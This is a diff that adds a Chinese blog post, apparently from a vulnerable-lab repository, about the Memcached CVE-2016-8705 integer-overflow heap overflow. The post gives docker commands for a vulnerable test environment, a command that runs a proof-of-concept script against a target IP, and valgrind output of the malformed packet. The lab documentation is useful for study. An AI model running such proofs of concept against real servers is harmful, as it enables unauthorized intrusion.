diff --git a/_posts/2017-03-10-m_memcached_cve-2016-8705.md b/_posts/2017-03-10-m_memcached_cve-2016-8705.md new file mode 100644 index 0000000..75c87ff --- /dev/null +++ b/_posts/2017-03-10-m_memcached_cve-2016-8705.md @@ -0,0 +1,114 @@ +--- +layout: post +title: "Memcached Server UPDATE 远程代码执行漏洞(CVE-2016-8705)" +date: 2017-03-10 00:15:16 +0800 +image: '/assets/img/' +description: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.' +main-class: 'hole' +color: '#B31917' +tags: +- Memcached +- RCE +categories: +- Memcached +twitter_text: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.' +introduction: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.' +--- + +### 说明 + + 感谢 [@xing-xiao](https://github.com/xing-xiao) 提供原始环境。 #6 + +### 漏洞信息 + + * [CVE-2106-8705漏洞信息](http://www.talosintelligence.com/reports/TALOS-2016-0220/) + +### 获取环境: + +1. 拉取镜像到本地 + ```bash +$ docker pull medicean/vulapps:m_memcached_CVE-2016-8705 + ``` + +2. 启动环境 + ```bash +$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 + ``` + + > 如果需要追溯堆栈,需在启动时 valgrind 调试 memcached,则启动环境命令如下: + + ```bash +$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 /valgrind.sh + ``` + +### 使用国内阿里云镜像 + +1. 拉取镜像到本地 + ```bash +$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32 + ``` + +2. 启动环境 + ```bash +$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32 + ``` + +### PoC + +1.获取目标 IP 地址与端口号,如:192.168.100.2 端口号为 11211 + +2.执行 poc.py + +```bash +$ python poc.py 192.168.100.2 11211 +``` + +3.查看追溯堆栈结果 + +``` +36: Client using the binary protocol +<36 Read binary protocol data: +<36 0x80 0x02 0x00 0xfa +<36 0x08 0x00 0x00 0x00 +<36 0xff 0xff 0xff 0xd0 +<36 0x00 0x00 0x00 0x00 +<36 0x00 0x00 0x00 0x00 +<36 0x00 0x00 0x00 0x00 +36: going from conn_parse_cmd to conn_nread +<36 ADD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Value len is -306 +==8== Thread 3: +==8== Invalid write of size 8 +==8== at 0x4C326CB: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) +==8== by 0x4132C8: memcpy (string3.h:53) +==8== by 0x4132C8: do_item_alloc (items.c:238) +==8== by 0x40A15A: process_bin_update (memcached.c:2222) +==8== by 0x40A15A: complete_nread_binary (memcached.c:2427) +==8== by 0x40A15A: complete_nread (memcached.c:2484) +==8== by 0x40D367: drive_machine (memcached.c:4656) +==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9) +==8== by 0x414874: worker_libevent (thread.c:380) +==8== by 0x52A26B9: start_thread (pthread_create.c:333) +==8== Address 0x5d1ae90 is 0 bytes after a block of size 1,048,512 alloc'd +==8== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) +==8== by 0x40F9DF: memory_allocate (slabs.c:538) +==8== by 0x40F9DF: do_slabs_newslab (slabs.c:233) +==8== by 0x40FA6E: do_slabs_alloc (slabs.c:328) +==8== by 0x41007E: slabs_alloc (slabs.c:584) +==8== by 0x4131E6: do_item_alloc (items.c:180) +==8== by 0x40A15A: process_bin_update (memcached.c:2222) +==8== by 0x40A15A: complete_nread_binary (memcached.c:2427) +==8== by 0x40A15A: complete_nread (memcached.c:2484) +==8== by 0x40D367: drive_machine (memcached.c:4656) +==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9) +==8== by 0x414874: worker_libevent (thread.c:380) +==8== by 0x52A26B9: start_thread (pthread_create.c:333) +==8== +``` + +> 注意: +> +> 该 PoC 并不会造成服务端崩溃。 + +### Exp + +> 暂无命令执行 Exp,如果你愿意分享该 Exp 可向本仓库发起 [Pull Request](https://github.com/Medicean/VulApps/compare)